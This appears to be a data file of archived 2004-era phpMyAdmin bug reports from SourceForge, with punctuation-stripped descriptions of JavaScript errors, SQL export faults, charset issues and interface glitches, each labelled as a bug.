solution add a limit of 500 databases shown in the selectbox, or better a selection of databases, that differ in name maybe 10 of each starting character 10 beginning with a..., 10 with b... and so on) and then an input field beneath the selectbox, where you can type in the name of a database, that you want to see i can program that for you, maybe i can get access to your CVS?
i know, there is an option cfg[ Servers ][ i][ only db ] but it would be nice if in there could be stored an array of databases, that should be shown, cause in my case there are more thyn 1 interesting databases on my server Original URL https sourceforge.net p phpmyadmin bugs 1227 https sourceforge.net p phpmyadmin bugs 1227 Original author rubo77 Found in version 2.6.0 alpha1","bug"
"24444","7597","Calendar not shown in 2.6.0 a1.
dear bugfixer, I found a mistake in tbl change.php , line 777. char 247 is a space but should be a gt;, because the nice) calendar will not be displayed this way!
Original line document.write lt;a title= lt;?php echo strCalendar;?
gt; href= javascript openCalendar \ lt;?php echo PMA generate common url );?
gt;\ , \ insertForm\ , \ field lt;?php echo i m rows); ?
gt; 3\ , \ lt;?php echo substr type, 0, 9)?
gt;\ ) lt;img class= calendar src= images button calendar.png alt= lt;?php echo strCalendar; ?
gt; gt; lt; a gt; ); Should be line document.write lt;a title= lt;?php echo strCalendar;?
gt; href= javascript openCalendar \ lt;?php echo PMA generate common url );?
gt;\ , \ insertForm\ , \ field lt;?php echo i m rows); ?
gt; 3\ , \ lt;?php echo substr type, 0, 9)?
gt;\ ) gt; lt;img class= calendar src= images button calendar.png alt= lt;?php echo strCalendar; ?
gt; gt; lt; a gt; ); This fix is working...
I hope this was not posted before...
Original URL https sourceforge.net p phpmyadmin bugs 1228 https sourceforge.net p phpmyadmin bugs 1228 Original author boppy Found in version 2.6.0 alpha1","bug"
"24444","7598","Nested Tables not working with Aliased Tables.
Nested Tables do not take cfg[ ShowTooltipAliasTB ] into account.
Same index logic should be used for building the nested table array than the one being used to build the table name in the left frame.
Original URL https sourceforge.net p phpmyadmin bugs 1229 https sourceforge.net p phpmyadmin bugs 1229 Original author garvinhicking Found in version Latest Git","bug"
"24444","7599","Stray <li> in query window.
In the Query Window source code, there s an lt;li gt; that s not part of an lt;ul gt;.
There is also no corresponding lt; li gt; to close it, which would be required for XHTML compliance, which I under stand phpMyAdmin is striving for.
This bullet looks the same in the Query Window as it does in the SQL tab of the main window, except that there, it is part of an lt;ul gt;.
Original URL https sourceforge.net p phpmyadmin bugs 1230 https sourceforge.net p phpmyadmin bugs 1230 Original author ryandesign Found in version Latest Git","bug"
"24444","7600","Query Window JS debug.
Don t know if this is known or expected with the Query Window JS debugging option, as I ve only just now found it and enabled it.
But I experienced the following situation with this option Turn on Query Window JS debugging in the config.inc and log into phpMyAdmin.
At the bottom of the main frame it says Window undefined Click the Query Window link in the lower left frame.
The Query Window opens.
Select a database from the menu in the upper left.
Last line of main frame reads Query Window can be updated Close the Query Window.
Then click the Query Window link in the main frame.
The main frame reloads into a new copy of the frameset, such that the left frame is now shown twice.
Original URL https sourceforge.net p phpmyadmin bugs 1231 https sourceforge.net p phpmyadmin bugs 1231 Original author ryandesign Found in version Latest Git","bug"
"24444","7601","Query window brokeness.
When I open query window and click on SQL link, I get whole phpMyAdmin inside little query window.
Mozilla 1.6 Original URL https sourceforge.net p phpmyadmin bugs 1232 https sourceforge.net p phpmyadmin bugs 1232 Original author nijel Found in version Latest Git","bug"
"24444","7602","Multiple foreign key constraints export wrong.
With InnoDB, a table using a multiple foreign key constraint is not exported correctly.
Platforms tested phpMyAdmin 2.5.6 MySQL 4.0.17 and MySQL 4.1.1a Windows IIS 5.0 and 6.0 and Windows Apache 2.x PHP 4.3.2 Tests have been done on the three webservers with both versions of MySQL.
How to reproduce the problem CREATE TABLE `master` `key1` varchar 8) NOT NULL default , `key2` varchar 8) NOT NULL default , PRIMARY KEY `key1`,`key2`), KEY `key2` `key2`) ) ENGINE=InnoDB; CREATE TABLE `constrained` `key1` varchar 8) NOT NULL default , `key2` varchar 8) NOT NULL default , PRIMARY KEY `key1`,`key2`), KEY `key2` `key2`) ) ENGINE=InnoDB; ALTER TABLE `constrained` ADD FOREIGN KEY `key1`, `key2`) REFERENCES `master` `key1`, `key2`); when exporting the database database gt;export gt;select all gt;export as SQL), we should get the same statements as above.
instead we get comments stripped) CREATE TABLE `constrained` `key1` varchar 8) NOT NULL default , `key2` varchar 8) NOT NULL default , PRIMARY KEY `key1`,`key2`), KEY `key2` `key2`), `key2`) REFERENCES `master` `key1`, `key2`) ) ENGINE=InnoDB; CREATE TABLE `master` `key1` varchar 8) NOT NULL default , `key2` varchar 8) NOT NULL default , PRIMARY KEY `key1`,`key2`), KEY `key2` `key2`) ) ENGINE=InnoDB; ALTER TABLE `constrained` ADD CONSTRAINT `0 370` FOREIGN KEY `key1`; The second part of the constraint in ALTER TABLE is moved in CREATE TABLE, which obviously makes MySQL complain look in CREATE TABLE at KEY `key2`),... ).
Hope it helps.
Original URL https sourceforge.net p phpmyadmin bugs 1233 https sourceforge.net p phpmyadmin bugs 1233 Original author anonymous Found in version 2.5.6","bug"
"24444","7603","DB structure rows selecting broken.
When I click on table in DB structure, the checkbox is checked and unchecked both actions on one click).
This happens just sometimes.
Mozilla 1.6, no javascript error.
Original URL https sourceforge.net p phpmyadmin bugs 1234 https sourceforge.net p phpmyadmin bugs 1234 Original author nijel Found in version Latest Git","bug"
"24444","7604","javascript error in results view.
When result view does not contain checkboxes eg.
EXPLAIN query), I get javascript error when clicking on row Error document.getElementById id rows to delete0 ) has no properties Original URL https sourceforge.net p phpmyadmin bugs 1235 https sourceforge.net p phpmyadmin bugs 1235 Original author nijel","bug"
"24444","7605","Undefined variable in db details structure.php.
I just got the latest Version from CVS and i must say the new look is very sexy... ;) But changing the Charset of a Database gives the following error Notice Undefined variable header url qry in whatever db details structure.php on line 668 PMA Latest CVS MySQL 4.1.1 Original URL https sourceforge.net p phpmyadmin bugs 1236 https sourceforge.net p phpmyadmin bugs 1236 Original author swatinem Found in version Latest Git","bug"
"24444","7606","JS error from db details structure.php 322 .
javascript error from ... db details structure.php 322 .... document.getElementById checkbox tbl lt;?php echo i; ?
gt; ) ?
return false return true)...
The problem is with return false and return true .
phpMyAdmin 2.6.0 alpha2 Fri May 7 16 53 33 UTC 2004) Microsoft Internet Explorer version 6.0.2800.1106c0 updates SP1; Q324929; Q810847; Q828750; Q330994; Q824145; Q832894; Q831167; Q837009 Original URL https sourceforge.net p phpmyadmin bugs 1237 https sourceforge.net p phpmyadmin bugs 1237 Original author pustlauk Found in version 2.6.0 alpha1","bug"
"24444","7607","JS Error in tbl properties structure.
Hi, two things.
I get the error message there s a syntax error in tbl properties structure.php As far as I can trace the error it s in the table cell containing the name of the data field in the HTML table.
I get as many syntax errors as there are fields in the MySQL data table.
Every error in the same column.
Secondly...same lines in fact.
There are two JS statements in the lines that IMHO exclude each other.
The statements are to un )check the checkbox on click on any column.
The first statement acts on click on the table cell, the second on the label with the field name.
When I now click on the field name the checkbox ist checked an unchecked in an instant.
The first statement can t distinguish between TD an LABEL) checks the box, the other unchecks.
I use MSIE 6.0.2800.1106 on Win2k Best, Bernhard Original URL https sourceforge.net p phpmyadmin bugs 1238 https sourceforge.net p phpmyadmin bugs 1238 Original author bardware Found in version Latest Git","bug"
"24444","7608","CSV headers wrong.
in excel sheet the fields names at first row are wrong.
The first field name is replacing all others fied names.
Plus the new line symbol is not translated \r\n).
phpMyAdmin 2.6.0 alpha3 MySQL 4.0.15 running on localhost as root localhost PHP Version 4.3.2 Platform MacOS X 10.2.8 gr giorez.com Original URL https sourceforge.net p phpmyadmin bugs 1239 https sourceforge.net p phpmyadmin bugs 1239 Original author anonymous Found in version Latest Git","bug"
"24444","7609","Missing edit delete buttons for lonq sql query.
search a database browse results Buttons Edit and Delete in front of each found record are replaced with question marks; tooltip on both question marks says You should define a primary key for this table , but the records are belonging to a table with a propperly defined primary key.
WinNT 4 SP6 phpMyAdmin 2.6.0 alpha2 Apache 2.0.44 PHP 4.3.5 MySQL 4.0.17 Win98SE Mozilla 1.7 RC1 Bye, Peter Original URL https sourceforge.net p phpmyadmin bugs 1240 https sourceforge.net p phpmyadmin bugs 1240 Original author mandabaer Found in version 2.6.0 alpha1","bug"
"24444","7610","Wrong detection of other storage engines.
Hi.
PMA doesnt correctly detect if for example innodb is available.
Thus there is no innodb option in the create table and the table operations dialogue.
PMA looks for have innodb in the SHOW VARIABLES output.
But using MySQL 4.1.1a alpha nt this is have innodb notice the missing underscore) I dont know since what version this has changed or if thats a OS based problem my mysql runs on windows).
Please take a look into it.
PMA Version is Latest CVS.
Original URL https sourceforge.net p phpmyadmin bugs 1241 https sourceforge.net p phpmyadmin bugs 1241 Original author swatinem","bug"
"24444","7611","export no quotes on varchar.
according to the table def.
below), field title is varchar.
However insert statments generated by export dont have quotes for this field.
In 2.5.6 it worked fine tested on same table) fails in 2.6.0 a1 and 2.6.0 a2 generated SQL dump code phpMyAdmin SQL Dump version 2.6.0 alpha2 http www.phpmyadmin.net Host localhost Generation Time May 12, 2004 at 01 39 AM Server version 4.1.1 PHP Version 5.0.0RC1 Database `sonic` Table structure for table `documents` DROP TABLE IF EXISTS `documents`; CREATE TABLE `documents` `docId` double unsigned NOT NULL auto increment, `title` varchar 255) NOT NULL default , `value` double NOT NULL default 0 , PRIMARY KEY `docId`) ) TYPE=InnoDB DEFAULT CHARSET=latin1 COMMENT= aggregated documents AUTO INCREMENT=590 ; Dumping data for table `documents` INSERT INTO `documents` `docId`, `title`, `value`) VALUES 486 , Root beer flows from sea to sea, 3.08353675 ), 487 , Meal deal appeal, 3.08353675 ), 488 , Country Style takes aim at Tim s, 3.08353675 ), 489 , No more breaks for McDonald s analysts, 3.08353675 ), 490 , Root beer flows from sea to sea, 3.08353675 ), 491 , Meal deal appeal, 3.08353675 ) Original URL https sourceforge.net p phpmyadmin bugs 1242 https sourceforge.net p phpmyadmin bugs 1242 Original author airbag Found in version 2.6.0 alpha2","bug"
"24444","7612","Invalid multi row insert handling.
search table select 2 or more records with selected Edit selected records are shown klicking on Go Notice Array to string conversion in tbl replace fields.php on line 153 This only happens on a slightly more complicated table 23 columns, 542 records).
I tried above procedure on a very simple table 5 columns, 26 records) and do not saw the Array to string conversion notice.
Structure of complicated table CREATE TABLE `bastelei` `rvn` varchar 16) NOT NULL default , `name` varchar 128) NOT NULL default , `slogn` varchar 255) default NULL, `hmv` varchar 13) default NULL, `vk bto` decimal 8,2) NOT NULL default 0.00 , `mwst` decimal 5,2) NOT NULL default 16.00 , `show` enum yes , no ) NOT NULL default yes , `aehnl` varchar 64) default NULL, `descr` text, `indic` text, `techd` text, `grp kom` set einfach , dynamisch , statisch , schrift , montage ) default NULL, `grp pco` set erstkontakt , schule , arbeitsplatz ) default NULL, `grp umf` set taste , sprache ) default NULL, `grp sns` set joystick , multisensor , singlesensor ) default NULL, `pic big` varchar 128) default NULL, `pic ico` varchar 128) default NULL, `pic med` varchar 128) default NULL, `pic sml` varchar 128) default NULL, `brvn` varchar 16) NOT NULL default , `dbl` varchar 128) default NULL, `gbr` varchar 128) default NULL, `kan` varchar 128) default NULL, `pbl` varchar 128) default NULL, PRIMARY KEY `rvn`), KEY `name` `name`), KEY `aehnl` `aehnl`), KEY `brvn` `brvn`) ) TYPE=MyISAM COMMENT= xxx ; server WinNT 4 SP6 phpMyAdmin 2.6.0 alpha2 Apache 2.0.44 PHP 4.3.5 MySQL 4.0.17 client Win98SE Mozilla 1.7 RC1 Bye, Peter Original URL https sourceforge.net p phpmyadmin bugs 1244 https sourceforge.net p phpmyadmin bugs 1244 Original author mandabaer","bug"
"24444","7613","Show false results also bug in insert manipulation).
CREATE TABLE `Auswertung` `ID` TINYINT NOT NULL AUTO INCREMENT , `email` TEXT NOT NULL , `01` TEXT NOT NULL , `02` TINYINT NOT NULL , `02a` TEXT NOT NULL , `03` TEXT NOT NULL , `04` TEXT NOT NULL , `04a` TEXT NOT NULL , `04b` TEXT NOT NULL , `04c` TEXT NOT NULL , `05` TEXT NOT NULL , `06` TINYINT NOT NULL , `06a` TEXT NOT NULL , `71` TINYINT NOT NULL , `71a` TEXT NOT NULL , `72` TINYINT NOT NULL , `72a` TEXT NOT NULL , `73` TINYINT NOT NULL , `73a` TEXT NOT NULL , `74` TINYINT NOT NULL , `74a` TEXT NOT NULL , `81` TINYINT NOT NULL , `82` TINYINT NOT NULL , `83` TINYINT NOT NULL , `84` TINYINT NOT NULL , `85` TINYINT NOT NULL , `09` TINYINT NOT NULL , `10a` TINYINT NOT NULL , `10b` TEXT NOT NULL , `10c` TINYINT NOT NULL , `11` TEXT NOT NULL , `11a` TEXT NOT NULL , `12` TEXT NOT NULL , `13` TINYINT NOT NULL , `14` TEXT NOT NULL , `14a` TEXT NOT NULL , `15` TEXT NOT NULL , `16` TINYINT NOT NULL , `17` TEXT NOT NULL , `XXX` VARCHAR 1 ) NOT NULL , PRIMARY KEY `ID` ) ) COMMENT = Umfrage ISDC ; in column 06,06a,71,71a,72,72a,73 shown false values...
If udate column 11 it also shown the value in column 06a if update column 12 it also shown the value in c. 71 Original URL https sourceforge.net p phpmyadmin bugs 1245 https sourceforge.net p phpmyadmin bugs 1245 Original author megachip Found in version 2.5.6","bug"
"24444","7614","Insert as new row leads to empty query.
if i edit a row, select insert as new row and then click on go i get this error Error SQL query [Edit] ; MySQL said 1065 Query was empty Original URL https sourceforge.net p phpmyadmin bugs 1243 https sourceforge.net p phpmyadmin bugs 1243 Original author em gotcha Found in version 2.6.0 alpha2","bug"
"24444","7615","PHP5rc2 bug SQL file importing not working.
On the SQL tab, trying to upload any type of file gives a No SQL Query!
error from pMA, and no SQL actually gets carried out.
Copy pasting the contents of the file into the textarea does work.
This first started happening after upgrading from PHP5b4 to PHP5RC1.
Upgrading it again to RC2 and a newer snapshot build didn t help.
Tried using pMA 2.5.6, 2.6.0 alpha1 and 2.6.0 alpha2, all with the same result.
Same result in several different browsers.
No PHP errors in the server log from this, even with an E ALL|E STRICT override.
I checked the php.ini file in case I messed something up, but file uploads are enabled and I even tried increasing the memory postdata size limits.
Currently using MySQL 4.1.1a alpha nt PHP Version 5.0.0RC3 dev May 11 2004 16 20 32) phpMyAdmin 2.6.0 alpha2 Firefox 0.8 Windows XP Home [anthony.parsons manx.net] Original URL https sourceforge.net p phpmyadmin bugs 1246 https sourceforge.net p phpmyadmin bugs 1246 Original author anonymous","bug"
"24444","7616","Multiple Column Drop Confirmation Bug.
This has occurred multiple times.
If I select several columns to drop using the checkboxes in the structure display, then click the drop icon below the column listing, I am presented with the following confirmation page ALTER TABLE `X lines` DROP `X DESC`, DROP `X CUSTOMTEXT1`, DROP `X CUSTOMTEXT2`, DROP `X CUSTOMTEXT3`; DROP `X CUSTOMTEXT4`, ?
Yes No Note the semicolon after the 4th column, and then the blank line, and the final column with the comma at the end.
The query executes properly, however.
Original URL https sourceforge.net p phpmyadmin bugs 1247 https sourceforge.net p phpmyadmin bugs 1247 Original author boone Found in version 2.5.6","bug"
"24444","7617","Unable to create database.
phpMyAdmin 2.2.7 pl1 MySQL 4.0.18 log PHP Version 5.0.0RC2 Notice Undefined variable db in home lappen public html admin db create.php on line 25 Error SQL query CREATE DATABASE MySQL said You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 Original URL https sourceforge.net p phpmyadmin bugs 1248 https sourceforge.net p phpmyadmin bugs 1248 Original author anonymous Found in version 2.2.7 pl1","bug"
"24444","7618","htmlspecialchars );.
mysql errors, the queries should have htmlspecialchars ); around it so that when you have something like INSERT INTO tbl VALUES lt;input type= text name= text gt; ); then it won t actually display an input field when outputting the error.
Original URL https sourceforge.net p phpmyadmin bugs 1250 https sourceforge.net p phpmyadmin bugs 1250 Original author garywk Found in version 2.5.6","bug"
"24444","7619","Undefined variable data in tbl select.php.
Notice Undefined variable data in phpMyAdmin 2.6.0 alpha2 tbl select.php on line 210 This occurs when I visit the Search tab of a table for which a phpMyAdmin relation is defined.
Original URL https sourceforge.net p phpmyadmin bugs 1251 https sourceforge.net p phpmyadmin bugs 1251 Original author ryandesign Found in version 2.6.0 alpha2","bug"
"24444","7620","delete with subquery says 0 deleted rows for > 2.6.0).
Running a delete Statement with a subquery for example DELETE FROM tab1 WHERE id NOT IN SELECT id FROM tab2) gives me the result that 0 rows are deleted, which is wrong becasuse the rows get delete without problems.
When i run the query in a php script and print out mysqli gt;affected rows it shows the correct result but PMA doesnt.
PMA Latest CVS PHP 5.0.0RC2 MySQL 4.1.1a alpha nt I configured PMA to use the mysqli extension cfg[ Servers ][ i][ extension ] = mysqli ;) Original URL https sourceforge.net p phpmyadmin bugs 1252 https sourceforge.net p phpmyadmin bugs 1252 Original author swatinem Found in version Latest Git","bug"
"24444","7621","Deleting last row results in PHP Error.
When deleting the last row of a table through the delete link that results in the following PHP Error Warning main ) [function.main] Unable to access .
sql.php?lang=de iso 8859 1 amp;amp;server=1 amp;amp;db=chartz amp;amp;table=counter cat amp;amp;pos=0 amp;amp;sql query=SELECT 2A FROM 60counter cat 60 in H \Seiten\phpMyAdmin\sql.php on line 604 Warning main .
sql.php?lang=de iso 8859 1 server=1 db=chartz table=counter cat pos=0 sql query=SELECT 2A FROM 60counter cat 60) [function.main] failed to open stream No such file or directory in H \Seiten\phpMyAdmin\sql.php on line 604 Fatal error main ) [function.require] Failed opening required .
sql.php?lang=de iso 8859 1 amp;amp;server=1 amp;amp;db=chartz amp;amp;table=counter cat amp;amp;pos=0 amp;amp;sql query=SELECT 2A FROM 60counter cat 60 include path= .
;H Seiten smarty ) in H \Seiten\phpMyAdmin\sql.php on line 604 PMA Latest CVS Original URL https sourceforge.net p phpmyadmin bugs 1253 https sourceforge.net p phpmyadmin bugs 1253 Original author swatinem Found in version Latest Git","bug"
"24444","7622","JS Syntax error generated structure.php.
Both tbl properties structure.php and db details structure.php generate code that causes syntax errors in Internet Explorer.
In tbl properties structure.php is the line lt;td lt;?php echo click mouse; ?
gt; bgcolor= lt;?php echo bgcolor; ?
gt; nowrap= nowrap gt; amp;nbsp; lt;label onclick= document.getElementById checkbox row lt;?
php echo i; ?
gt; ) ?
return false return true) for= checkbox row lt;?php echo i; ?
gt; gt; lt;?php echo field name; ?
gt; lt; label gt; amp;nbsp; lt; td gt; In the syntax error is the return statements in the ?
expression and should be changed to lt;td lt;?php echo click mouse; ?
gt; bgcolor= lt;?php echo bgcolor; ?
gt; nowrap= nowrap gt; amp;nbsp; lt;label onclick= return document.getElementById checkbox row lt;?php echo i; ?
gt; ) ?
false true) for= checkbox row lt;?php echo i; ?
gt; gt; lt;?php echo field name; ?
gt; lt; label gt; amp;nbsp; lt; td gt; There is a similar error in db details structure.php Regards A.
Original URL https sourceforge.net p phpmyadmin bugs 1254 https sourceforge.net p phpmyadmin bugs 1254 Original author anonymous Found in version 2.6.0 alpha2","bug"
"24444","7623","Highlighting broken in vertical browse mode.
When I browse any table in vertical mode and clicking on some row ... after first click is color always green.
SW winXP, IE6 xpsp2 tested on inet Demo.
Original URL https sourceforge.net p phpmyadmin bugs 1255 https sourceforge.net p phpmyadmin bugs 1255 Original author jenix Found in version Latest Git","bug"
"24444","7624","field names error.
When exporting data, if the option to display Field Names is selected, only the first field name is repeated for all the fieldnames.
phpMyAdmin 2.6.0 alpha2 .
shawn Original URL https sourceforge.net p phpmyadmin bugs 1256 https sourceforge.net p phpmyadmin bugs 1256 Original author anonymous","bug"
"24444","7625","Undefined variables host icon img.... Notice Undefined variable host icon img phpMyAdmin 20040529 210007 header.inc.php on line 192 Notice Undefined variable db icon img in phpMyAdmin 20040529 210007 header.inc.php on line 201 Notice Undefined variable tbl icon img in phpMyAdmin 20040529 210007 header.inc.php on line 211 Happens when I click the Search tab.
Original URL https sourceforge.net p phpmyadmin bugs 1257 https sourceforge.net p phpmyadmin bugs 1257 Original author ryandesign Found in version Latest Git","bug"
"24444","7626","Table type is called engine in MySQL 4.1.2.
FYI, In 4.1.2 which was released this weekend, the table types, were renamed to engine.
mysql gt; SHOW TABLE STATUS like ClickRaw ; | Name | Engine | Row format | Rows | Avg row length | Data length | Max data length | Index length | Data free | Auto increment | Create time | Update time | Check time | Collation | Checksum | Create options | Comment | | ClickRaw | MyISAM | Fixed | 0 | 0 | 0 | 1073741823999 | 1024 | 0 | 1 | 2004 03 29 12 08 52 | 2004 03 29 12 08 52 | 2004 03 29 12 08 52 | latin1 swedish ci | NULL | | | 1 row in set 0.00 sec) | Name | Type | Row format | Rows | Avg row length | Data length | Max data length | Index length | Data free | Auto increment | Create time | Update time | Check time | Collation | Checksum | Create options | Comment | | ClickRaw | MyISAM | Fixed | 0 | 0 | 0 | 1073741823999 | 1024 | 0 | 1 | 2004 03 29 12 08 52 | 2004 03 29 12 08 52 | 2004 03 29 12 08 52 | latin1 swedish ci | NULL | | | 1 row in set 0.02 sec) So quite a bit breaks.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1258 https sourceforge.net p phpmyadmin bugs 1258 Original author anonymous Found in version 2.6.0 alpha2","bug"
"24444","7627","Parser chokes on GROUP CONCAT ...ORDER..).
The parser seems to mess up everything when using GROUP CONCAT, which is available since 4.1.0.
Testcase CREATE TABLE `group concat test` `a` tinyint 4) NOT NULL default 0 , `b` char 1) NOT NULL default ); INSERT INTO `group concat test` VALUES 0, x ); INSERT INTO `group concat test` VALUES 0, a ); INSERT INTO `group concat test` VALUES 0, g ); INSERT INTO `group concat test` VALUES 0, j ); INSERT INTO `group concat test` VALUES 0, w ); INSERT INTO `group concat test` VALUES 0, q ); INSERT INTO `group concat test` VALUES 1, z ); INSERT INTO `group concat test` VALUES 1, 9 ); INSERT INTO `group concat test` VALUES 2, l ); INSERT INTO `group concat test` VALUES 4, x ); Query that fails SELECT a, GROUP CONCAT b ORDER BY b ASC SEPARATOR ) FROM group concat test GROUP BY a; Original URL https sourceforge.net p phpmyadmin bugs 1259 https sourceforge.net p phpmyadmin bugs 1259 Original author rabus Found in version 2.6.0 beta2","bug"
"24444","7628","ChangeLog should display, not download.
The main menu has a link to view the PMA change log.
The link is programmed to open a new window, which implies that the PMA developers intend the user to be able to view the change log in that new window.
However, in at least Firefox 0.8 and Safari 1.2.2, clicking this link causes the browser to attempt to save the ChangeLog file to the disk instead of displaying it.
I presume this is because the file ChangeLog has no extension and therefore the browser doesn t know what to do with it.
I assume that changing its name to something like ChangeLog.txt would fix the problem.
Original URL https sourceforge.net p phpmyadmin bugs 1261 https sourceforge.net p phpmyadmin bugs 1261 Original author ryandesign Found in version Latest Git","bug"
"24444","7629","Option to hide new main menu icons.
I d like a config file option to hide those new icons that show up on the main menu in 2.6.0 alpha3.
Geez they look awful IMHO) ) I already kill them myself by using a custom CSS with this definition ul.mainLeft li \{ list style none; padding top 4px; padding bottom 4px; \} But the cleaner solution would be to offer a config file directive.
Original URL https sourceforge.net p phpmyadmin bugs 1262 https sourceforge.net p phpmyadmin bugs 1262 Original author ryandesign Found in version Latest Git","bug"
"24444","7630","Unknown Size or Record Number.
I am running 2.6.0 alpha 2 and MYSQL 4.1.2 alpha with php 5 RC2 couldn t get mysqli to compile for some reason) and the regular mysql client.
I noticed that when I am in the table listing screen for a database, it lists unknown for the number of records in every table and unknown for the size of each table.
It also produces a sum of 0 for both columns at the bottom.
If I were to view each table in the properties screen, the number of rows are counted as well as the size of the table.
Original URL https sourceforge.net p phpmyadmin bugs 1264 https sourceforge.net p phpmyadmin bugs 1264 Original author luegner Found in version 2.6.0 alpha2","bug"
"24444","7631","Spaces after colons.
Sometimes the server[ database[ table]] header shown at the top of most pages has a space before the colon, sometimes it doesn t. If you look at the Privileges page from the main menu, for example, the header reads Server whatever no space between the word Server and the colon that follows it but when you select a database from the select menu in the left frame, then the header reads Server whatever gt; Database whatever with a space between Server and the colon.
In the English language, I recommend removing the spaces before the colons.
I have no comment on whether it should be different in other locales.)
Original URL https sourceforge.net p phpmyadmin bugs 1263 https sourceforge.net p phpmyadmin bugs 1263 Original author ryandesign Found in version Latest Git","bug"
"24444","7632","timestamp 10) fields are corrupted on re import.
phpMyAdmin 2.3.3pl1... when exporting tables which contain a timestamp 10) field, the values are exported as 10 digit numbers.
when trying to re import the exported script, the timestamp values are corrupted.
i believe they are always set to the year 2000 and some date and time i haven t analyzed this.
after appending two trailing zeros to each datetime value in the file, the dates will be imported correctly.
this may already be fixed in current versions, but i could not approve this, since my provider is using 2.3.3pl1.
Original URL https sourceforge.net p phpmyadmin bugs 1265 https sourceforge.net p phpmyadmin bugs 1265 Original author anonymous","bug"
"24444","7633","Double column sort fails with JOIN).
Whenever you run an SQL query, then click on one of the columns to order by ASC, then click on it against to order by DESC.
The query will fail.
It doesn t happen when you just browser a table, but with something like this.
SELECT FROM Word INNER JOIN WordMagicScores USING word id ) INNER JOIN Phrase USING phrase id ) LEFT JOIN PVR.Price ON Phrase.phrase = Price.term WHERE Word.word = party poopers It would fail, after the first two sorts.
And the failure would be this.
SELECT FROM Word INNER JOIN WordMagicScores USING word id ) INNER JOIN Phrase USING phrase id ) LEFT JOIN PVR.Price ON Phrase.phrase = Price.term WHERE Word.word = party poopers ORDER BY `WordMagicScores`.`relevancy` ASC ORDER BY `WordMagicScores`.`relevancy` DESC LIMIT 0 , 100 Hope this helps.
Donny Original URL https sourceforge.net p phpmyadmin bugs 1266 https sourceforge.net p phpmyadmin bugs 1266 Original author anonymous Found in version 2.6.0 alpha2","bug"
"24444","7634","MySQL connection failure message misleading.
With the PMA CVS snapshot from 20040601 attempting to connect to a MySQL server that s down gives this message Cannot connect invalid settings.
This is misleading, because the settings are in fact just fine; the problem is that the server is offline.
Attempting a connection to the same non existent server in PMA 2.5.6 gives this slightly more helpful message 2013 Lost connection to MySQL server during query Is there a reason the message was changed for 2.6.0?
Original URL https sourceforge.net p phpmyadmin bugs 1267 https sourceforge.net p phpmyadmin bugs 1267 Original author ryandesign Found in version Latest Git","bug"
"24444","7635","Unexpected UTF 8 behavior MySQL <= 4.0).
I m experincing some unexpected behavior, and either the behavior is wrong and should be changed, or my expectations are incorrectly set, and maybe documentation needs to be added.
Here s the issue On the login page, and on the home page once you ve logged in, you can select your language from a select menu.
For many languages, there s the choice of a charset that s native to that language, and then UTF 8.
The unexpected behavior is that this charset also becomes the charset that s used when inserting data into MySQL.
That is, if I select English en iso 8859 1) as my language and then insert special chars into the database, they get saved as ISO 8859 1 chars.
But if I select English en utf 8) as my language, then special chars I insert get stored into the database as UTF 8 chars.
If I later switch which Language I use, or if a different user in my team logs in with a different Language that is, with a different charset) then they see the wrong data in the database.
Currently I m using MySQL 4.0.x which supports only one charset at a time.
I had expected that PMA would always insert data into the database using this charset, regardless of what charset my preferred interface language is.
To me, and I think to most end users, the language in which the user sees the PMA interface and the charset with which data is inserted into the database are not related in any way.
MySQL 4.1.x of course supports one charset per field, so things become more complicated there.
I personally am in favor of PMA using UTF 8 for everything, always outputting UTF 8 to the browser, and always accepting UTF 8 input from the user, and using the mb string extensions or iconv or whatever to then convert this input into the charset the database expects.
Or, I guess current versions of MySQL have built in ways to handle that.
So is this behavior I ve observed intended, or is it a bug?
If intended, is it documented somewhere that it behaves this way?
It just seems a really great way for someone to inadvertently get data of the wrong charset into their database without realizing it until possibly much later.
On the off chance that this is browser dependent, I ve observed it in Safari 1.2.x and Camino 0.8 2004060508 on Mac OS X.
Original URL https sourceforge.net p phpmyadmin bugs 1268 https sourceforge.net p phpmyadmin bugs 1268 Original author ryandesign Found in version 2.6.0 alpha2","bug"
"24444","7636","Apache mod encoding phpMyAdmin.
I have found an incompatiblity between mod encoding see http webdav.todo.gr.jp download and http www.hss.caltech.edu help unix admin web apache webdav xp) and phpMyAdmin.
When the EncodingEngine is turned ON some functions are broken in phpMyAdmin.
For exemple DB gt; Table gt; Browse gt; Insert new row function returns after form submission sql.php Missing sql query sql.php Missing db Also delete row with the red trash icon) doesn t work.
Some export fonctions are also affected...
I have tested with phpMyAdmin 2.5.6 and phpMyAdmin 2.6.0 alpha2 Linux RH9 MySQL 4.0.20 Apache 1.3.31 Unix) PHP 4.3.7 DAV 1.0.3 mod ssl 2.8.18 OpenSSL 0.9.7d mod encoding 20021209 I don t know where the incompatibility come from but so far phpMyAdmin seems the only piece of code affected...
The actual workaround is to turn off EncodingEngine for the phpMyAdmin directory lt;Directory path ... phpMyAdmin gt; lt;IfModule mod encoding.c gt; EncodingEngine off lt; IfModule gt; lt; Directory gt; or ON only on webdav directories...
Thanks for your work!
Original URL https sourceforge.net p phpmyadmin bugs 1269 https sourceforge.net p phpmyadmin bugs 1269 Original author anonymous","bug"
"24444","7637","config.inc.php.
Line 314 in config.inc.php is missing a closing ] bracket.
Latest CVS of phpMyAdmin 2004 06 08) Vytautas Original URL https sourceforge.net p phpmyadmin bugs 1270 https sourceforge.net p phpmyadmin bugs 1270 Original author vytautas Found in version Latest Git","bug"
"24444","7638","Copy user with table privs.
Hello.
I have found an bug.
I have an user that have table privilegies.
The user dmcs may select all fields and update the fields counter and counter2 in the table vts kategorien of database viathinksoft.
Now I want to copy the user.
Error Server localhost Fehler SQL Befehl GRANT SELECT , INSERT `counter2, counter` ) ON `viathinksoft`.`vts kategorien` TO dmcs ; MySQL meldet 1054 Unknown column counter2, counter in vts kategorien [Dokumentation] The problem is, that pma think that the column name is counter, counter2 I got mysql 3.x and PMA 2.5.7!
Original URL https sourceforge.net p phpmyadmin bugs 1272 https sourceforge.net p phpmyadmin bugs 1272 Original author blackdrake Found in version 2.5.7","bug"
"24444","7639","Insert Data from Textfile drops records without notification.
Hello, I imported data from a formated text textfile into my table created in MySQL using phpMyAdmin.
My textfile has 50373 lines records, but my resultant table only has 50352 records.
Obviously there was a problem with 21 of the lines records.
How can I find out what the problem is?
I can t seem to find any way to get a MySQL errors report from phpMyAdmin for an import.
Surely there is a way to do this.
I m using V2.5.5 pl1 of phpMyAdmin and MySQL version 4.0.18 standard.
